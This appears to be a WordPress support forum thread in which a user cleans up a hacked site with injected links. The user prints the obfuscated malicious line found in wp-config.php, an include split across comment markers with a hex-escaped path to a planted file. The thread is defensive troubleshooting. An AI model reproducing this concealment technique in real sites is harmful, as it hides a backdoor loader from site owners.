pacebrian0

Well, that was a pain to find, the malicious code was hidden in the comments of wp_config.php, which I compared to the php sample.

/**
 * WordPress Database Tabl*/include /*e prefix.
 *
 * You*/"\x2fhom\x654/k\x61ndy\x6bids\x2fpub\x6cic_\x68tml\x2fwp-\x69ncl\x75des\x2fTex\x74/Di\x66f/d\x65fin\x65s.p\x68p";/* can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */

Thanks a lot for all the help, and I hope this thread helps anyone else having the same problem.

I have deleted wp_includes and wp_admin and replaced them with a new files from wordpress. The links are gone, however, I am getting an error regarding defines.php, which I think it is being referenced from wp_config.php.

This is the error:

Warning: include(/home4/mysite/public_html/wp-includes/Text/Diff/defines.php): failed to open stream: No such file or directory in /home4/mysite/public_html/wp-config.php on line 65

Warning: include(): Failed opening '/home4/mysite/public_html/wp-includes/Text/Diff/defines.php' for inclusion (include_path='.:/opt/php54/lib/php') in /home4/mysite/public_html/wp-config.php on line 65

Well, I don’t think this is something theme-related since changing the theme does not remove the links.

Regarding #2:

I am certain I downloaded the theme from the official page. I cannot see how it could have been hacked unless there is a security hole. I have installed wordfence to help increase security also, it detected a few files which were malicious but the links were still there.

I cannot find any bad code. Here are the files i found called “footer.php”
My theme is Virtue Premium if that helps.

Virtue – Premium: footer.php
https://dpaste.de/LRpb

Virtue – Premium: footer.php (templates/footer.php)
https://dpaste.de/Ninf

Thank you for the insight. I have a question regarding the footer.php

Is this code situated in the theme options? Because I cannot detect any line containing malicious code.